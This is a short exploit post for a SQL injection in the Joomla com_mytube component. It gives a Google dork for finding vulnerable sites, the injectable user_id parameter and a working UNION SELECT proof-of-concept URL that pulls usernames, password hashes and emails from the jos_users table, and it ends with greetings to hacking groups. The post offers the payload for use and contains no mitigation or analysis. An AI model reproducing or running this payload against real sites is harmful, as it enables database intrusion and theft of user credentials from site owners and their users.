facebook facebook twitter rss

Joomla ( com_mytube ) SQL injection Vulnerability

Author: Over-X , Published: 17-05-2012
# Exploit Title:  Joomla ( com_mytube ) SQL injection Vulnerability
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: http://www.joomla.com
# Version: [1.5 & 1.6 & 1.7]
# Google dork: "com_mytube"
# Tested on: win Xp
######################################################################################
Explite : localhost/index.php?view=videos&type=member&option=com_mytube&user_id=[SQLI]
adminpage : localhost/administrator
# POC :
http://www.domain.tld/joomla//index.php?view=videos&type=member&option=com_mytube&user_id=-62%20UNION%20SELECT%201,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--
######################################################################################
Gre: Sec4ever.com & L3b r1z & b0x & Damane2011 & Invectus & Kha&mix

Like us on Facebook :